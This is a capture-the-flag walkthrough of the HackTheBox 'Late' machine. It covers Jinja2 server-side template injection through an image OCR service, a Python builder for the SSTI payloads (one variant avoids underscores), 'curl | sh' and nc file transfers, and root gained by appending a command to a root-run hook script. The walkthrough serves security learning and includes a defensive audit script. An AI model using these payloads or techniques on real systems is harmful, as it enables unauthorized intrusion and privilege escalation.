HTB Late Walkthrough

A technical walkthrough of the HackTheBox LATE challenge from the King of HTB Andy From Italy.


Simple, but with well-hidden clues. Much time was spent researching the right exploits. Let's see what steps were required to capture the flags of this BOX.

The nmap scan:

Starting Nmap 7.92 ( ) at 2022-05-11 21:20 CEST
Nmap scan report for
Host is up (0.060s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.05 seconds

Really simple. On the portal we find a contact form, the support email (support@late.htb) and an obvious hint at a second site on a third-level domain (images.late.htb). Add the new name to the /etc/hosts file and open it in the browser.

Interesting. I try uploading a few files to understand what we are dealing with (including types unrelated to what the portal describes). For those the message is "invalid extension", but sticking to the advertised functionality and uploading an image containing some text, I receive a ".txt" file with the text extracted from the image.

In any case, before going further I check with dirb whether there is any hidden folder (although I am almost convinced that my target is this converter).

└─$ dirb http://images.late.htb/

DIRB v2.22    
By The Dark Raver

START_TIME: Wed May 11 21:50:16 2022
URL_BASE: http://images.late.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://images.late.htb/ ----
END_TIME: Wed May 11 21:54:19 2022

Nothing on the image converter service...

└─$ dirb http://late.htb/ 

DIRB v2.22    
By The Dark Raver

START_TIME: Wed May 11 22:09:32 2022
URL_BASE: http://late.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://late.htb/ ----
==> DIRECTORY: http://late.htb/assets/                                                                             
+ http://late.htb/index.html (CODE:200|SIZE:9461)                                                                  
---- Entering directory: http://late.htb/assets/ ----
==> DIRECTORY: http://late.htb/assets/css/                                                                         
==> DIRECTORY: http://late.htb/assets/fonts/                                                                       
==> DIRECTORY: http://late.htb/assets/images/                                                                      
==> DIRECTORY: http://late.htb/assets/js/                                                                          

...and nothing on the main portal either. Let's go back to the conversion service. Its title says it is written in Flask, a Python web micro-framework whose default template engine is Jinja2. Searching for "injection in flask" I find some interesting links.

Injecting Flask
We’ve taken a look at some of the features provided in Flask for output escaping, the potential issues, and the fixes available should you come across some vulnerable code.

So I type something in a text editor and take a screenshot of it...

...upload the image to the portal and receive the message "Error occured while processing the image: unexpected char '“' at 10". That is a Jinja2 template syntax error: the text extracted from the image is being rendered as a template rather than inserted as data, and the curly quote that the screenshot introduced is not valid template syntax.

For the moment we can say that we are probably on the right path. I make a few more attempts to understand how best to exploit the vulnerability and, at the same time, continue the research, finding another interesting link.

Server Side Template Injection with Jinja2
In this post, Gus looks into building Jinja2 SSTI payloads from zero. While also playing with bypass methods and different exploitation techniques.

The output is...

<p> a 

I think I have to combine the information I have found, but I am more and more convinced that I am on the right path. I spend part of the time looking for the most suitable font for the conversion: many of the problems come from the converter getting confused by the underscore character "_" (exactly what I need most to reach the dunder attributes such as __class__), sometimes recognising only one of two. I therefore pick a font in which consecutive underscores remain clearly distinguishable, with a visible gap between them: "Lucida Bright". (An alternative that sidesteps the OCR problem entirely is to avoid the literal character: Jinja2 string literals accept hex escapes, so ''|attr('\x5f\x5fclass\x5f\x5f') reaches __class__ without a single underscore in the image.)

The output is the following:

<p>[&lt;class &#39;type&#39;&gt;, &lt;class &#39;weakref&#39;&gt;, &lt;class &#39;weakcallableproxy&#39;&gt;, &lt;class &#39;weakproxy&#39;&gt;, &lt;class &#39;int&#39;&gt;, &lt;class &#39;bytearray&#39;&gt;, [...] &lt;class &#39;WebPAnimDecoder&#39;&gt;, &lt;class &#39;WebPAnimEncoder&#39;&gt;]

Then, formatted in a more readable way:

[<class 'type'>, 
<class 'weakref'>, 
<class 'weakcallableproxy'>, 
<class 'weakproxy'>, 
<class 'int'>, 
<class 'bytearray'>, 
<class 'bytes'>, 
<class 'list'>, 
<class 'NoneType'>, 
<class 'WebPAnimDecoder'>, 
<class 'WebPAnimEncoder'>]

I have some difficulty because the classes used in the article do not appear in my list. I therefore focus on the ones I do see that could work the same way; since I need to access files, IOBase could do.

io — Core tools for working with streams — Python 3.10.4 documentation

I'm not that lucky, though, and I can't get at the methods of the class. I retrace my steps and read the article again. Looking into the specific objects used in the example, I eventually understand that they are still available as standard names of the framework in use (Flask injects them into every template context), so I can use them without problems.

So I try the get_flashed_messages function (a Flask helper that is always present in the template context, and whose __globals__ reach the module that defines it), but I still have some problems. So I decide to look for a specific exploit.
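As an added example (not from the walkthrough or from the box), the following stand-alone Python reproduces the introspection the Jinja2 payloads rely on and builds the payload strings. It walks object.__subclasses__() exactly as the {{ ''.__class__.__mro__[1].__subclasses__() }} dump above does, looks up a landing class by name instead of by a hard-coded index (indexes differ between Python builds, which is why the list had to be dumped first), and runs the same attribute chain in plain Python to show what the template engine ends up executing. The landing class _wrap_close, the command strings and the no-underscore variant built with the attr filter and \x5f escapes are my choices, not the author's; the payload strings are only built, not rendered, since no Jinja2 is used here.

```python
"""Added example: the Python introspection behind a Jinja2 SSTI payload.

Plain Python, no Jinja2: the payload strings are built, not rendered. The
object walk itself is real and is exactly what the template engine performs
when it evaluates the payload.
"""
import os  # site.py imports os at startup anyway; this guarantees os._wrap_close is in the list

LANDING_CLASS = '_wrap_close'  # plain class in os.py whose __init__ globals are the os module dict


def subclasses():
    """The list the walkthrough dumped: ''.__class__.__mro__[1] is `object`."""
    return ''.__class__.__mro__[1].__subclasses__()


def find_class_index(name):
    """Index of the first subclass of object called `name`, or None.

    Indexes vary between Python builds, so never hard-code one from a blog post.
    """
    for index, cls in enumerate(subclasses()):
        if cls.__name__ == name:
            return index
    return None


def find_class_with_global(symbol):
    """(index, class name) of the first class whose __init__ globals contain `symbol`.

    This finds a landing class without knowing its name: any pure-Python class
    defined in a module that imported os exposes os.popen / os.system this way.
    """
    for index, cls in enumerate(subclasses()):
        init_globals = getattr(getattr(cls, '__init__', None), '__globals__', None)
        if isinstance(init_globals, dict) and symbol in init_globals:
            return index, cls.__name__
    return None


def run_chain(index, command):
    """Execute the attribute chain in plain Python: what the rendered payload does."""
    cls = subclasses()[index]
    return cls.__init__.__globals__['popen'](command).read()


def build_payload(index, command):
    """Classic payload; every underscore has to survive the OCR step."""
    return ("{{ ''.__class__.__mro__[1].__subclasses__()[%d]"
            ".__init__.__globals__['popen']('%s').read() }}" % (index, command))


def hex_escape_underscores(name):
    r"""'__class__' -> '\x5f\x5fclass\x5f\x5f'; Jinja2 decodes \x escapes in string literals."""
    return name.replace('_', '\\x5f')


def build_payload_no_underscores(index, command):
    """Same chain through the attr() filter, so no '_' character is needed in the image.

    Parentheses matter: Jinja2 allows a call, but not a subscript, directly after a filter.
    """
    def a(name):
        return "|attr('%s')" % hex_escape_underscores(name)
    return ("{{ ((''%s%s|list|last%s)()[%d]%s%s)['popen']('%s').read() }}"
            % (a('__class__'), a('__mro__'), a('__subclasses__'),
               index, a('__init__'), a('__globals__'), command))


if __name__ == '__main__':
    idx = find_class_index(LANDING_CLASS)
    print('landing class index:', idx, 'first class exposing popen:', find_class_with_global('popen'))
    print(build_payload(idx, 'id'))
    print(build_payload_no_underscores(idx, 'id'))
    print(run_chain(idx, 'id'))
```

Run it on the attacking machine with the same Python major version as the target to get a feel for the list, then still dump __subclasses__() on the target itself: the index is only meaningful for the interpreter that renders the template.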

RCE with Server-Side Template Injection
RCE with Server-Side Template Injection by Nairuz Abulhul. Server-side template injection is a web application vulnerability that occurs in template-generated applications. User inputs get embedded dynamically into the template variables and rendered on the web pages.

...and finally the injected template reads /etc/passwd for me (partial output):

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
avahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
colord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
smmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin


Well, let's see which users can log in with a shell.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.156 - Late (lin)]
└─$ grep -v nologin ~/Downloads/results\(24\).txt
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash


Apparently there is only one user other than root with a login shell (svc_acc).

...and the first flag appears...



And since we have such a helpful user, who knows whether he also left us a private key for the SSH connection.



Woooo, great! :)

Before moving on, I want to share a screenshot of the tests I did during the session, to give you an idea of how long and patient an activity of this type can be.

Then we prepare our private key and access the BOX via SSH.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ cp ~/Downloads/results\(26\).txt ./id_rsa
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ vi id_rsa  
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ chmod 400 id_rsa                         
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ ssh -i id_rsa svc_acc@ 
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:LsThZBhhwN3ctG27voIMK8bWCmPJkR4iDV9eb/adDOc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.

Immediately check whether I can do something as root without entering a password (the classic clue on an HTB BOX).

svc_acc@late:~$ sudo -l
[sudo] password for svc_acc: 
Sorry, try again.
[sudo] password for svc_acc: 
Sorry, try again.
[sudo] password for svc_acc: 
sudo: 3 incorrect password attempts

Once again I'm not that lucky. I download the latest version of linpeas and prepare for a session.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/upld]
└─$ wget
--2022-05-18 15:28:03--
Resolving (
Connecting to (||:443... connected.
Saving to: ‘’                       100%[==========================================================>] 758.56K  1.06MB/s    in 0.7s    

2022-05-18 15:28:04 (1.06 MB/s) - ‘’ saved [776761/776761]

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/upld]
└─$ php -S
[Wed May 18 15:28:50 2022] PHP 8.1.2 Development Server ( started

We run linpeas on the BOX without saving the script to disk, keeping only its output...

svc_acc@late:~$ curl | sh | tee lpeas.out

...then retrieve the resulting file, first starting a listener on our machine...

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/dwnl]
└─$ nc -lp 4445 > lpeas.out

...and finally, let's send it from the BOX to the listener.

svc_acc@late:~$ nc -w 3 4445 < lpeas.out

Perfect, let's take a look at the file and mark the points worth investigating.


╔══════════╣ Sudo version
Sudo version 1.8.21p2                                                                                                               
╔══════════╣ Executing Linux Exploit Suggester
[+] [CVE-2021-4034] PwnKit                                                                                                          

   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit

   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL:

[+] [CVE-2018-18955] subuid_shell

   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL:
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Exposure: less probable
   Tags: mint=19
   Download URL:
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Exposure: less probable
   Download URL:

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1
   Download URL:
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
╔══════════╣ Active Ports
tcp        0      0 *               LISTEN      -                                                   
tcp        0      0    *               LISTEN      -                   
tcp        0      0  *               LISTEN      -                   
tcp        0      0*               LISTEN      1295/python3        
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-- 1 root dip 370K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                         
-rwsr-xr-x 1 root root 10K Jan 13  2018 /usr/sbin/sensible-mda (Unknown SUID binary)
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59K Jan 25 16:26 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solar
-rwsr-xr-x 1 root root 19K Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40K Jan 25 16:26 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 146K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /usr/bin/chsh
-rwsr-xr-x 1 root root 22K Jun 28  2019 /usr/bin/arping
-rwsr-sr-x 1 root mail 95K Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 427K Mar  3  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14K Jan 12 12:34 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 31K Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43K Sep 16  2020 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /bin/su
-rwsr-xr-x 1 root root 63K Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 27K Sep 16  2020 /bin/umount  --->  BSD/Linux(08-1996)

╔══════════╣ SGID
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /usr/bin/wall                                                                                
-rwxr-sr-x 1 root shadow 23K Jan 25 16:26 /usr/bin/expiry
-rwxr-sr-x 1 root mail 18K Nov 16  2017 /usr/bin/lockfile
-rwxr-sr-x 1 root ssh 355K Mar  3  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14K Jan 17  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 71K Jan 25 16:26 /usr/bin/chage
-rwsr-sr-x 1 root mail 95K Nov 16  2017 /usr/bin/procmail
-rwxr-sr-x 1 root mlocate 43K Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-lock
-rwxr-sr-x 1 root mail 18K Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 11K Nov  7  2017 /usr/bin/dotlock.mailutils
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root crontab 39K Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-unlock
-rwxr-sr-x 1 root smmsp 845K Jan 13  2018 /usr/lib/sm.bin/sendmail  --->  Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2
-rwxr-sr-x 1 root smmsp 77K Jan 13  2018 /usr/lib/sm.bin/mailstats (Unknown SGID binary)
-rwxr-sr-x 1 root utmp 10K Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /sbin/unix_chkpwd
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/mail/access.db: regular file, no read permission                                                                         
Found /etc/mail/aliases.db: regular file, no read permission
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3022000

A lot of points, really too many; let's concentrate on the suggested CVEs first.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/dwnl]
└─$ grep -i CVE lpeas.out
╔══════════╣ CVEs Check
[+] [CVE-2021-4034] PwnKit
   Download URL:
[+] [CVE-2021-3156] sudo Baron Samedit
   Download URL:
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Download URL:
[+] [CVE-2018-18955] subuid_shell
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Download URL:
[+] [CVE-2019-18634] sudo pwfeedback
   Download URL:
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
[+] [CVE-2017-0358] ntfs-3g-modprobe
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

The suggested points and CVEs took me a long time, led nowhere, and in the end I had to retrace my steps.

The suggested CVEs were not useful for my purpose: some did not work, and for others I did not find a suitable exploit. I then resumed the analysis of the points I had marked as interesting, for example the ports open only on localhost and reachable only from inside the machine.

svc_acc@late:~$ curl
220 localhost.localdomain ESMTP Sendmail 8.15.2/8.15.2/Debian-10; Thu, 19 May 2022 19:24:51 GMT; (No UCE/UBE) logging access from: localhost.localdomain(OK)-localhost.localdomain []
421 4.7.0 localhost.localdomain Rejecting open proxy localhost.localdomain []
svc_acc@late:~$ curl
220 localhost.localdomain ESMTP Sendmail 8.15.2/8.15.2/Debian-10; Thu, 19 May 2022 19:25:43 GMT; (No UCE/UBE) logging access from: localhost.localdomain(OK)-localhost.localdomain []
421 4.7.0 localhost.localdomain Rejecting open proxy localhost.localdomain []
svc_acc@late:~$ curl
<!DOCTYPE html>
<html lang="en">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Image Reader</title>
    <div class="container">
        <h1 class="text-center" style="font-size: 10vh">Convert image to text<span style="font-size: 3vh;">with Flask</span></h1>

        <h4 align='center'>If you want to turn an image into a text document, you came to the right place.</h4>

So ports 25 and 587 are the SMTP server (Sendmail), while port 8000 is the Flask application behind the third-level domain (the python3 process in the listing above). Both deserve a closer look and could be our point of attack; let's keep them in mind and look for something else.

I also cross-reference the SMTP server with a file that could be interesting, the root user's mailbox, but it seems I do not have permission to read it.

svc_acc@late:~$ ls -la /var/mail/root
-rw------- 1 root mail 13377 May 19 19:23 /var/mail/root
svc_acc@late:~$ cat /var/mail/root
cat: /var/mail/root: Permission denied

I'll spare you the boredom of all the remaining attempts I made, but I'll list them for completeness:

  • nothing among the files modified in the last 5 minutes
  • nothing in the backup files
  • no exploitable SUID or SGID binary
  • nothing among the running processes on the BOX

Dead end. I return to the linpeas output, focusing this time on everything I had previously excluded. I check all the listed services, but still nothing. Then the phrase "You own the script" catches my attention.

╔══════════╣ .sh files in path
You own the script: /usr/local/sbin/                                                                                     

Let's see what's inside.

svc_acc@late:~$ cat /usr/local/sbin/

SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

It appears to do nothing more than send an email with some server information; the text notifies the start of an SSH session. The PAM_USER, PAM_RHOST and PAM_TYPE variables are the ones pam_exec passes to a hook script, so an email is sent to the recipient every time someone logs in over SSH. Who runs it? Let's take a look at the running processes.

svc_acc@late:/usr/lib/sm.bin$ ps -aux | grep
root       524  0.0  0.1  20056  3548 ?        Ss   20:30   0:00 /bin/bash /usr/local/sbin/
root       603  0.0  0.1  20056  3588 ?        Ss   20:30   0:00 /bin/bash /usr/local/sbin/
root       922  0.0  0.1  20056  3508 ?        Ss   20:31   0:00 /bin/bash /usr/local/sbin/
svc_acc   1222  0.0  0.0  13144  1068 pts/5    S+   20:32   0:00 grep --color=auto
root     31631  0.0  0.1  20056  3624 ?        Ss   20:21   0:00 /bin/bash /usr/local/sbin/
root     31638  0.0  0.0  20056   292 ?        S    20:21   0:00 /bin/bash /usr/local/sbin/
root     31696  0.0  0.1  20056  3604 ?        Ss   20:23   0:00 /bin/bash /usr/local/sbin/
root     31708  0.0  0.0  20056   292 ?        S    20:23   0:00 /bin/bash /usr/local/sbin/
root     31775  0.0  0.1  20056  3692 ?        Ss   20:24   0:00 /bin/bash /usr/local/sbin/
root     31782  0.0  0.0  20056   288 ?        S    20:24   0:00 /bin/bash /usr/local/sbin/
root     31823  0.0  0.1  20056  3656 ?        Ss   20:24   0:00 /bin/bash /usr/local/sbin/
root     31834  0.0  0.0  20056   292 ?        S    20:24   0:00 /bin/bash /usr/local/sbin/

The script always runs as root. It seems too easy: as the owner of the file I can modify the script as I like, for example to copy the root flag somewhere I can read it, and trigger it with an SSH login. I try, but as soon as I save the file I am warned that it cannot be written.

WARNING: The file has been changed since reading it!!!
Do you really want to write to it (y/n)?y
"/usr/local/sbin/" E166: Can't open linked file for writing
Press ENTER or type command to continue

Let's take a closer look at the file.

svc_acc@late:/usr/lib/sm.bin$ ls -la /usr/local/sbin/
-rwxr-xr-x 1 svc_acc svc_acc 433 May 19 20:37 /usr/local/sbin/

I had to make a huge effort to understand, but when one of the most interesting sources of my past came to mind, the road was illuminated. "Appunti di informatica libera" is one of the manuals that, when I started approaching Linux, was my source of absolute truth (and, forgive the digression, it was written by an Italian). I remembered the chapter on file permissions and in particular a very interesting feature of Linux filesystems: the ability to mark a file so that it can be modified in append mode only (the "a" attribute managed with chattr). I link both the original manual, in Italian...

Appunti di informatica libera

...and the same article in English.

File Permissions

So, let's check it out.

svc_acc@late:~$ lsattr /usr/local/sbin/
-----a--------e--- /usr/local/sbin/
svc_acc@late:~$ lsattr -l /usr/local/sbin/
/usr/local/sbin/ Append_Only, Extents

As I imagined, and if I remember correctly, clearing this attribute is reserved for root (it requires the CAP_LINUX_IMMUTABLE capability).

svc_acc@late:~$ chattr -a /usr/local/sbin/
chattr: Operation not permitted while setting flags on /usr/local/sbin/

Not bad: the attribute blocks overwriting and truncation but not appending, so I can still add a command at the end of the script that runs as root right after the email is sent. I have it copy the root flag to /tmp, dropping root's mode and ownership so that I can read the copy.

svc_acc@late:/tmp$ echo "cp --no-preserve=mode,ownership /root/root.txt /tmp/tempr.txt " >> /usr/local/sbin/
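The root cause here is a script that root executes (a pam_exec hook, judging by the PAM_* variables) but that a low-privilege user owns; the append-only attribute only stops truncation and overwriting. As an added example (not part of the walkthrough), the Python below encodes that check: it parses lsattr -l output, evaluates owner, permission bits and attributes, and reports why the protection is insufficient. The audit rules, the finding texts, the constructed sample lines and the assumption that paths in lsattr output contain no spaces are mine; audit_path needs Linux with lsattr available to fill in the attributes, while audit() itself is pure and runs anywhere.

```python
"""Added example: audit a script that root executes for write paths a low-privilege user keeps.

The rules mirror the situation in the walkthrough: a non-root owner plus the
Append_Only attribute still lets the owner append lines that root will run.
The lsattr output format handled here and the sample lines are assumptions of
this example.
"""
import os
import shutil
import subprocess
import sys


def parse_lsattr_long(line):
    """Parse one line of `lsattr -l` output into a set of attribute names.

    Constructed input: '/usr/local/sbin/x.sh    Append_Only, Extents'
    lsattr prints '---' when no attribute is set. Assumes the path has no spaces.
    """
    _path, _sep, attrs = line.strip().partition(' ')
    attrs = attrs.strip()
    if not attrs or attrs == '---':
        return set()
    return {name.strip() for name in attrs.split(',') if name.strip()}


def audit(uid, mode, attrs):
    """Findings for a root-executed script with owner `uid`, permission bits `mode`
    (e.g. 0o755) and chattr attributes `attrs` (names as printed by `lsattr -l`).

    Returns an empty list when nobody but root can change what root will run.
    """
    if 'Immutable' in attrs:
        return []  # +i blocks every write path, including append and rename, whoever owns the file
    findings = []
    if uid != 0:
        findings.append('owned by uid %d, not root: the owner controls what root executes' % uid)
    if mode & 0o020:
        findings.append('group-writable')
    if mode & 0o002:
        findings.append('world-writable')
    if findings and 'Append_Only' in attrs:
        # The attribute that looked like a defence on the box: it stops "open(..., 'w')"
        # and truncation, but ">>" succeeds and the appended commands run as root.
        findings.append('append-only (+a) only blocks overwrite and truncation: ">>" still works '
                        'and appended commands run as root')
    return findings


def audit_path(path):
    """Stat a real file and, when lsattr is available (Linux, e2fsprogs), add its attributes."""
    st = os.stat(path)
    attrs = set()
    if shutil.which('lsattr'):
        proc = subprocess.run(['lsattr', '-l', path], capture_output=True, text=True)
        if proc.returncode == 0 and proc.stdout.strip():
            attrs = parse_lsattr_long(proc.stdout.splitlines()[0])
    return audit(st.st_uid, st.st_mode & 0o777, attrs)


if __name__ == '__main__':
    # Usage: python3 audit_hook.py /usr/local/sbin/some-hook.sh ...
    for hook in sys.argv[1:]:
        print(hook, audit_path(hook) or ['ok'])
```

The fix on the defending side follows from the findings: a script that PAM or cron runs as root must be owned by root, not group- or world-writable, and live in a directory with the same properties; +a is a log-file attribute, not an integrity control, and +i is the one that actually prevents the append.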

Let's connect again and hope that our first guess (script started on every SSH login) is correct.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ ssh -i id_rsa svc_acc@

It's the moment of truth.

svc_acc@late:/tmp$ ls -la
total 48
drwxrwxrwt 11 root root 4096 May 19 21:25 .
drwxr-xr-x 23 root root 4096 Apr  7 13:51 ..
prw-rw-r--  1 root root    0 May 19 21:21 f
drwxrwxrwt  2 root root 4096 May 19 21:06 .font-unix
drwxrwxrwt  2 root root 4096 May 19 21:06 .ICE-unix
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-ModemManager.service-s6mam1
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-systemd-resolved.service-qmQkZt
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-systemd-timesyncd.service-g3VCd9
-rw-rw-r--  1 root root   33 May 19 21:25 tempr.txt
drwxrwxrwt  2 root root 4096 May 19 21:06 .Test-unix
